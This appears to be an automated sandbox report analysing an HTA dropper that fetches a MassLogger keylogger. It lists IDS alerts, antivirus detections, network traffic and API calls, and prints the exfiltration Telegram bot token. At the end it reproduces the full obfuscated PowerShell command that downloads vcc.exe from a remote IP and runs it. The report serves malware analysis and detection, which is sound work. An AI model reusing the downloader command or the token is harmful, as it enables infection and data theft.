@"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline", ProcessId: 7200, ProcessName: csc.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-11T09:21:30.179599+010020220501A Network Trojan was detected23.95.235.2880192.168.2.649687TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-11T09:21:30.271474+010020220511A Network Trojan was detected23.95.235.2880192.168.2.649687TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-11T09:21:30.179554+010020197142Potentially Bad Traffic192.168.2.64968723.95.235.2880TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-11T09:21:38.688714+010028032742Potentially Bad Traffic192.168.2.649688132.226.247.7380TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\vcc.exeAvira: detection malicious, Label: TR/AVI.Agent.tqpct
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcc[1].exeAvira: detection malicious, Label: TR/AVI.Agent.tqpct
                    Found malware configuration
                    Source: 0000000C.00000002.2497932312.00000000027E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcc[1].exeReversingLabs: Detection: 75%
                    Source: C:\Users\user\AppData\Roaming\vcc.exeReversingLabs: Detection: 75%
                    Multi AV Scanner detection for submitted file
                    Source: kissingwithbestexperiencedgirlfriendonhereformenice.htaVirustotal: Detection: 30%Perma Link
                    Source: kissingwithbestexperiencedgirlfriendonhereformenice.htaReversingLabs: Detection: 21%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49689 version: TLS 1.0
                    Source: Binary string: wntdll.pdbUGP source: vcc.exe, 0000000B.00000003.1357954160.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 0000000B.00000003.1355704739.0000000003450000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: vcc.exe, 0000000B.00000003.1357954160.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 0000000B.00000003.1355704739.0000000003450000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.pdb source: powershell.exe, 00000003.00000002.1360527053.0000000004C67000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009445A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0009445A
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009C6D1 FindFirstFileW,FindClose,11_2_0009C6D1
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0009C75C
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0009EF95
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0009F0F2
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0009F3F3
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_000937EF
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00093B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00093B12
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0009BCBC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 025E5782h12_2_025E5366
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 025E51B9h12_2_025E4F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 025E5782h12_2_025E56AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05140740h12_2_05140498
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051402E8h12_2_05140040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esp, ebp12_2_05144DCA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_05140B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051417FDh12_2_05141620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05142187h12_2_05141620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_05141163
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_05141343

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 23.95.235.28:80 -> 192.168.2.6:49687
                    Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 23.95.235.28:80 -> 192.168.2.6:49687
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 11 Mar 2025 08:21:30 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 10 Mar 2025 13:04:37 GMTETag: "eba00-62ffc9d4aa7e0"Accept-Ranges: bytesContent-Length: 965120Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 e3 ce 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 d8 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 83 ef 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 78 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 30 02 00 00 70 0c 00 00 32 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 b0 0e 00 00 72 00 00 00 48 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                    Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49687 -> 23.95.235.28:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49688 -> 132.226.247.73:80
                    Source: global trafficHTTP traffic detected: GET /560/vcc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49689 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_045C7A18 URLDownloadToFileW,3_2_045C7A18
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /560/vcc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: powershell.exe, 00000003.00000002.1382287079.0000000007DB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/560/vcc.exe
                    Source: powershell.exe, 00000003.00000002.1380526589.0000000006EBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/560/vcc.exe2
                    Source: powershell.exe, 00000003.00000002.1382287079.0000000007DB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/560/vcc.exeh
                    Source: powershell.exe, 00000003.00000002.1382287079.0000000007DB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/560/vcc.exeowC:
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com(
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.000000000284E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: vcc.exe, 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: powershell.exe, 00000003.00000002.1382287079.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microjC
                    Source: powershell.exe, 00000003.00000002.1358584579.000000000278F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micNB
                    Source: powershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.000000000287D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.000000000287D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1360527053.00000000047B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1360527053.00000000047B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: vcc.exe, 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: powershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1382287079.0000000007E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: powershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: vcc.exe, 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_000A4164
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_000A4164
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_000A3F66
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,11_2_0009001C
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_000BCABC

                    System Summary

                    barindex
                    Detected Cobalt Strike Beacon
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
